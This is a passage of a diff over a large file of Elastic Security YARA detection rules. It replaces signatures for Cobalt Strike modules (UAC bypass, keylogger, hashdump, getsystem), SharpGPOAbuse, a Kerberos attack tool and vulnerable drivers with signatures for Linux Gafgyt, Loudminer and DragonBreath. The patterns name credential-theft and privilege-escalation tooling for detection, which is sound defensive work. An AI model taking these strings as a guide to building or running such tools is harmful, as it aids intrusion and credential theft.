"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Loudminer.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" + logic_hash = "6c2c9b6aea1fb35f8f600dd084ed9cfd56123f7502036e76dd168ccd8b43b28f" score = 75 - quality = 25 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e11f6f3a847817644d40fee863e168cd2a18e8e0452482c1e652c11fe8dd769e" + fingerprint = "8eafc1c995c0efb81d9ce6bcc107b102551371f3fb8efdf8261ce32631947e03" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $s1 = "[dump | list | askhash | describe | asktgt | asktgs | s4u | ptt | remove | asklkdcdomain]" fullword - $s2 = "[-] Error in parseKirbi: %s" - $s3 = "[-] Error in parseTGSREP: %s" - $s4 = "genPasswordHashPassword:Length:Enc:Username:Domain:Pretty:" - $s5 = "storeLKDCConfDataFriendlyName:Hostname:Password:CCacheName:" - $s6 = "bifrostconsole-" - $s7 = "-kerberoast" - $s8 = "asklkdcdomain" - $s9 = "askhash" + $a = { B6 04 07 41 8D 40 D0 3C 09 76 AD 41 8D 40 9F 3C 05 76 A1 41 8D } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Vulndriver_Fidpci_Cb7F69B5 : FILE +rule ELASTIC_Linux_Cryptominer_Loudminer_851Fc7Aa : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Fidpci (Windows.VulnDriver.Fidpci)" + description = "Detects Linux Cryptominer Loudminer (Linux.Cryptominer.Loudminer)" author = "Elastic Security" - id = "cb7f69b5-5421-493b-adf7-75130d19b001" - date = "2022-04-04" - modified = "2022-04-04" + id = "851fc7aa-6514-4f47-b6b5-a1e730b5d460" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Fidpci.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46" - logic_hash = "459429fb4e5156890f19c451e48676c9cd06eaab1c2eaea9236737c795086b5f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Loudminer.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" + logic_hash = "9f271a16fe30fbf0c16533522b733228f19e0c44d173e4c0ef43bf13323e7383" score = 75 quality = 75 - tags = "FILE" - fingerprint = "19da3f67e302d0a70d40533553a19ba91a99a83609c01c8f296834a93fa325e2" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "e4d78229c1877a023802d7d99eca48bffc55d986af436c8a1df7c6c4e5e435ba" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\fidpcidrv64.pdb" + $a = { 49 8B 45 00 4C 8B 40 08 49 8D 78 18 49 89 FA 49 29 D2 49 01 C2 4C } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Hacktool_Sharpgpoabuse_14Ea480E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Dragonbreath_B27Bc56B : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpgpoabuse (Windows.Hacktool.SharpGPOAbuse)" + description = "Detects Windows Trojan Dragonbreath (Windows.Trojan.DragonBreath)" author = "Elastic Security" - id = "14ea480e-fbd5-4dd3-885c-9a13bfb4400b" - date = "2024-03-25" - modified = "2024-05-08" + id = "b27bc56b-41a2-4b3d-bff4-a14b90debe08" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpGPOAbuse.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d13f87b9eaf09ef95778b2f1469aa34d03186d127c8f73c73299957d386c78d1" - logic_hash = "efc1259f4ed05c8f41df75c056d36fd5a808a92b5c88cfb0522caedea39476b4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DragonBreath.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45023fd0e694d66c284dfe17f78c624fd7e246a6c36860a0d892d232a30949be" + logic_hash = "b86d5541a7e03a698ad918cdbba987474c6680353b4d2de2f8422ecd0ebcac61" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "1f86d5dfc193076127dcc4355cbf0c4bdffc0785ca2daf8e1364d76ee273b343" + fingerprint = "4bc82f64191cf907d7ecf7da5453258c9be60e5dbaff770ebc22d9629bcbc7e2" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -66578,69 +67399,58 @@ rule ELASTIC_Windows_Hacktool_Sharpgpoabuse_14Ea480E : FILE MEMORY os = "windows" strings: - $name = "SharpGPOAbuse" wide fullword - $s1 = "AddUserTask" wide fullword - $s2 = "AddComputerTask" wide fullword - $s3 = "AddComputerScript" wide fullword - $s4 = "AddUserScript" wide fullword - $s5 = "GPOName" wide fullword - $s6 = "ScheduledTasks" wide fullword - $s7 = "NewImmediateTask" wide fullword + $a1 = { 50 6C 75 67 69 6E 4D 65 } + $a2 = { 69 73 41 52 44 6C 6C } + $a3 = { 25 64 2D 25 64 2D 25 64 20 25 64 3A 25 64 } condition: - ($name and 1 of ($s*)) or all of ($s*) + all of them } -rule ELASTIC_Windows_Backdoor_Teamviewer_Df8E7326 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_83715433 : FILE MEMORY { meta: - description = "Detects Windows Backdoor Teamviewer (Windows.Backdoor.TeamViewer)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "df8e7326-5879-48d7-8a5f-1c9a2d8b7f8d" - date = "2022-10-29" - modified = "2022-12-20" - reference = "https://vms.drweb.com/virus/?i=8172096" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Backdoor_TeamViewer.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "68d9ffb6e00c2694d0d827108d0410d5a66d4f8cf839afddd17c5887b0149350" - logic_hash = "3d42c76626c76959e450a81001c73d8d47b52789cab324e0cc7af09303c1367d" + id = "83715433-3dff-4238-8cdb-c51279565e05" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3648a407224634d76e82eceec84250a7506720a7f43a6ccf5873f478408fedba" + logic_hash = "7a7328322c2c1e128e267e92de0964e78ad9f49b7de8ec69d7f0632c69723a7d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0f2406e98fa1383e39672bd4ec32a111363f7d33f8bc33c2bd7ea36353faab45" + fingerprint = "25ac15f4b903d9e28653dad0db399ebd20d4e9baabf5078fbc33d3cd838dd7e9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "m%c%c%c%c%c%c.com" ascii fullword - $a2 = "client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d" ascii fullword - $a3 = "\\save.dat" ascii fullword - $a4 = "auth_ip" ascii fullword - $a5 = "updips" ascii fullword - $b1 = { 55 8B EC 56 E8 BF 25 00 00 50 E8 7B 5B 00 00 8B F0 59 85 F6 75 2C 8B 75 08 56 E8 A9 25 00 00 50 } + $a = { 8B 45 08 88 10 FF 45 08 8B 45 08 0F B6 00 84 C0 75 DB C9 C3 55 } condition: - 5 of ($a*) or 1 of ($b*) + all of them } -rule ELASTIC_Linux_Trojan_Sqlexp_1Aa5001E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_28A2Fe0C : FILE MEMORY { meta: - description = "Detects Linux Trojan Sqlexp (Linux.Trojan.Sqlexp)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "1aa5001e-0609-4830-9c6f-675985fa50cf" - date = "2021-04-06" + id = "28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sqlexp.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "714a520fc69c54bcd422e75f4c3b71ce636cfae7fcec3c5c413d1294747d2dd6" - logic_hash = "48c7331c80aa7d918f46d282c6f38b8e780f9b5222cf9304bf1a8bb39cc129ab" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L21-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "04bbc6c40cdd71b4185222a822d18b96ec8427006221f213a1c9e4d9c689ce5c" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "afce33f5bf064afcbd8b1639755733c99171074457272bf08f0c948d67427808" + fingerprint = "a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -66648,2611 +67458,2125 @@ rule ELASTIC_Linux_Trojan_Sqlexp_1Aa5001E : FILE MEMORY os = "linux" strings: - $a = { 89 E3 52 53 89 E1 B0 0B CD 80 00 00 ?? 00 } + $a = { 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Echodrv_D17Ff31C : FILE +rule ELASTIC_Linux_Trojan_Gafgyt_Eb96Cc26 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Echodrv (Windows.VulnDriver.EchoDrv)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "d17ff31c-59d1-4bea-be25-c6f7fe2b8c7b" - date = "2023-10-31" - modified = "2023-11-03" + id = "eb96cc26-e6d6-4388-a5da-2501e6e2ea32" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_EchoDrv.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ea3c5569405ed02ec24298534a983bcb5de113c18bc3fd01a4dd0b5839cd17b9" - logic_hash = "0b2eb3c5da8703749ee63662495d6e8738ccdc353f3ac3df48e25a77312c0da0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L40-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "440318179ba2419cfa34ea199b49ee6bdecd076883d26329bbca6dca9d39c500" + logic_hash = "3d8740a6cca4856a73ea745877a3eb39cbf3ad4ca612daabd197f551116efa04" score = 75 quality = 75 - tags = "FILE" - fingerprint = "dcf828c8db88580faeaa78f4bcda5a01ff4e710cb3e1e0912a99665831a070b4" + tags = "FILE, MEMORY" + fingerprint = "73967a3499d5dce61735aa2d352c1db48bb1d965b2934bb924209d729b5eb162" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "D:\\WACATACC\\Projects\\Programs\\Echo\\x64\\Release\\echo-driver.pdb" + $a = { 49 6E 66 6F 3A 20 0A 00 5E 6A 02 5F 6A 01 58 0F 05 6A 7F 5F } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $str1 + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_C851687A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_5008Aee6 : FILE MEMORY { meta: - description = "Identifies UAC Bypass module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "c851687a-aac6-43e7-a0b6-6aed36dcf12e" - date = "2021-03-23" - modified = "2021-08-23" + id = "5008aee6-3866-4f0a-89bf-bde740baee5c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L1-L37" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7fac6fb24ac18bd69dd9f8f4090c4a77d1cc6554b6ae5c846e32d7666e5a1971" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L60-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b32cd71fcfda0a2fcddad49d8c5ba8d4d68867b2ff2cb3b49d1a0e358346620c" + logic_hash = "538bae17dcf0298e379f656e1dba794b75af6c7448a23253a51994bde9d30524" score = 75 - quality = 25 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "70224e28a223d09f2211048936beb9e2d31c0312c97a80e22c85e445f1937c10" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "6876a6c1333993c4349e459d4d13c11be1b0f78311274c0f778e65d0fabeeaa7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "bypassuac.dll" ascii fullword - $a2 = "bypassuac.x64.dll" ascii fullword - $a3 = "\\\\.\\pipe\\bypassuac" ascii fullword - $b1 = "\\System32\\sysprep\\sysprep.exe" wide fullword - $b2 = "[-] Could not write temp DLL to '%S'" ascii fullword - $b3 = "[*] Cleanup successful" ascii fullword - $b4 = "\\System32\\cliconfg.exe" wide fullword - $b5 = "\\System32\\eventvwr.exe" wide fullword - $b6 = "[-] %S ran too long. Could not terminate the process." ascii fullword - $b7 = "[*] Wrote hijack DLL to '%S'" ascii fullword - $b8 = "\\System32\\sysprep\\" wide fullword - $b9 = "[-] COM initialization failed." ascii fullword - $b10 = "[-] Privileged file copy failed: %S" ascii fullword - $b11 = "[-] Failed to start %S: %d" ascii fullword - $b12 = "ReflectiveLoader" - $b13 = "[-] '%S' exists in DLL hijack location." ascii fullword - $b14 = "[-] Cleanup failed. Remove: %S" ascii fullword - $b15 = "[+] %S ran and exited." ascii fullword - $b16 = "[+] Privileged file copy success! %S" ascii fullword + $a = { 50 16 B4 87 58 83 00 21 84 51 FD 13 4E 79 28 57 C3 8B 30 55 } condition: - 2 of ($a*) or 10 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_0B58325E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_6321B565 : FILE MEMORY { meta: - description = "Identifies Keylogger module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "0b58325e-2538-434d-9a2c-26e2c32db039" - date = "2021-03-23" - modified = "2021-08-23" + id = "6321b565-ed25-4bf2-be4f-3ffa0e643085" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L39-L77" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "3822431e946fcc38c700cc8ce213e95f33a155d7f38b6ab2a24cb998d42c8521" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L80-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cd48addd392e7912ab15a5464c710055f696990fab564f29f13121e7a5e93730" + logic_hash = "ad5c73ab68059101acf2fd8cfb3d676fd1ff58811e1c4b9008c291361ee951b8" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8ecd5bdce925ae5d4f90cecb9bc8c3901b54ba1c899a33354bcf529eeb2485d4" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "c1d286e82426cbf19fc52836ef9a6b88c1f6e144967f43760df93cf1ab497d07" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "keylogger.dll" ascii fullword - $a2 = "keylogger.x64.dll" ascii fullword - $a3 = "\\\\.\\pipe\\keylogger" ascii fullword - $a4 = "%cE=======%c" ascii fullword - $a5 = "[unknown: %02X]" ascii fullword - $b1 = "ReflectiveLoader" - $b2 = "%c2%s%c" ascii fullword - $b3 = "[numlock]" ascii fullword - $b4 = "%cC%s" ascii fullword - $b5 = "[backspace]" ascii fullword - $b6 = "[scroll lock]" ascii fullword - $b7 = "[control]" ascii fullword - $b8 = "[left]" ascii fullword - $b9 = "[page up]" ascii fullword - $b10 = "[page down]" ascii fullword - $b11 = "[prtscr]" ascii fullword - $b12 = "ZRich9" ascii fullword - $b13 = "[ctrl]" ascii fullword - $b14 = "[home]" ascii fullword - $b15 = "[pause]" ascii fullword - $b16 = "[clear]" ascii fullword + $a = { D8 89 D0 01 C0 01 D0 C1 E0 03 8B 04 08 83 E0 1F 0F AB 84 9D 58 FF } condition: - 1 of ($a*) and 14 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_2B8Cddf8 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_A6A2Adb9 : FILE MEMORY { meta: - description = "Identifies dll load module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "2b8cddf8-ca7a-4f85-be9d-6d8534d0482e" - date = "2021-03-23" - modified = "2021-08-23" + id = "a6a2adb9-9d54-42d4-abed-5b30d8062e97" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L79-L114" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "5502c06d33b93bae3bc25ba7dd6a5a9a3b0b2b43bb7e867e601ecb206bf503ed" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L100-L118" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" + logic_hash = "8f5fc4cb1ad51178701509a44a793e119fe7e7fad97eafcac8be14fce64e3b7b" score = 75 - quality = 43 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0d7d28d79004ca61b0cfdcda29bd95e3333e6fc6e6646a3f6ba058aa01bee188" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\dllload.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\dllload.x86.o" ascii fullword - $b1 = "__imp_BeaconErrorDD" ascii fullword - $b2 = "__imp_BeaconErrorNA" ascii fullword - $b3 = "__imp_BeaconErrorD" ascii fullword - $b4 = "__imp_BeaconDataInt" ascii fullword - $b5 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword - $b6 = "__imp_KERNEL32$OpenProcess" ascii fullword - $b7 = "__imp_KERNEL32$CreateRemoteThread" ascii fullword - $b8 = "__imp_KERNEL32$VirtualAllocEx" ascii fullword - $c1 = "__imp__BeaconErrorDD" ascii fullword - $c2 = "__imp__BeaconErrorNA" ascii fullword - $c3 = "__imp__BeaconErrorD" ascii fullword - $c4 = "__imp__BeaconDataInt" ascii fullword - $c5 = "__imp__KERNEL32$WriteProcessMemory" ascii fullword - $c6 = "__imp__KERNEL32$OpenProcess" ascii fullword - $c7 = "__imp__KERNEL32$CreateRemoteThread" ascii fullword - $c8 = "__imp__KERNEL32$VirtualAllocEx" ascii fullword + $a = { CC 01 C2 89 55 B4 8B 45 B4 C9 C3 55 48 89 E5 48 81 EC 90 00 } condition: - 1 of ($a*) or 5 of ($b*) or 5 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_59B44767 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_C573932B : FILE MEMORY { meta: - description = "Identifies getsystem module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "59b44767-c9a5-42c0-b177-7fe49afd7dfb" - date = "2021-03-23" - modified = "2021-08-23" + id = "c573932b-9b3f-4ab7-a6b6-32dcc7473790" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L116-L142" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7027d0dcbdb1961d2604f29392a923957d298a047c268553599ea8c881f76a98" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L120-L138" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" + logic_hash = "174a3fcebc1e17cc35ddc11fde1798164b5783fc51fdf16581a9690c3b4d6549" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "882886a282ec78623a0d3096be3d324a8a1b8a23bcb88ea0548df2fae5e27aa5" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\getsystem.x86.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\getsystem.x64.o" ascii fullword - $b1 = "getsystem failed." ascii fullword - $b2 = "_isSystemSID" ascii fullword - $b3 = "__imp__NTDLL$NtQuerySystemInformation@16" ascii fullword - $c1 = "getsystem failed." ascii fullword - $c2 = "$pdata$isSystemSID" ascii fullword - $c3 = "$unwind$isSystemSID" ascii fullword - $c4 = "__imp_NTDLL$NtQuerySystemInformation" ascii fullword + $a = { 83 7D 18 00 74 22 8B 45 1C 83 E0 02 85 C0 74 18 83 EC 08 6A 2D FF } condition: - 1 of ($a*) or 3 of ($b*) or 3 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_7Efd3C3F : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_A10161Ce : FILE MEMORY { meta: - description = "Identifies Hashdump module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "7efd3c3f-1104-4b46-9d1e-dc2c62381b8c" - date = "2021-03-23" - modified = "2021-08-23" + id = "a10161ce-62e0-4f60-9de7-bd8caf8618be" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L144-L168" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "45a0aaba6c1be016fc5f4051680ee7e3aa62e8a5d9730b7adab08c14ae37da24" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L140-L157" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "12ba13a746300d1ab1d0386b86ec224eebf4e6d0b3688495c2fee6a7eccc361d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9e7c7c9a7436f5ee4c27fd46d6f06e7c88f4e4d1166759573cedc3ed666e1838" - threat_name = "Windows.Trojan.CobaltStrike" - severity = 70 + fingerprint = "77e89011a67a539954358118d41ad3dabde0e69bac2bbb2b2da18eaad427d935" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "hashdump.dll" ascii fullword - $a2 = "hashdump.x64.dll" ascii fullword - $a3 = "\\\\.\\pipe\\hashdump" ascii fullword - $a4 = "ReflectiveLoader" - $a5 = "Global\\SAM" ascii fullword - $a6 = "Global\\FREE" ascii fullword - $a7 = "[-] no results." ascii fullword + $a = { 45 B0 8B 45 BC 48 63 D0 48 89 D0 48 C1 E0 02 48 8D 14 10 48 8B } condition: - 4 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_6E971281 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Ae01D978 : FILE MEMORY { meta: - description = "Identifies Interfaces module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "6e971281-3ee3-402f-8a72-745ec8fb91fb" - date = "2021-03-23" - modified = "2021-08-23" + id = "ae01d978-d07d-4813-a22b-5d172c477d08" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L170-L201" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "f204965c0118dbdfe7e134d319c92b30d22585e888609ff31df90643116a2c38" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L159-L176" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c6c22b11dc1f0d4996e5da92c6edf58b7d21d7be40da87ddd39ed0e2d4c84072" score = 75 - quality = 51 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "62d97cf73618a1b4d773d5494b2761714be53d5cda774f9a96eaa512c8d5da12" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "2d937c6009cfd53e11af52482a7418546ae87b047deabcebf3759e257cd89ce1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = 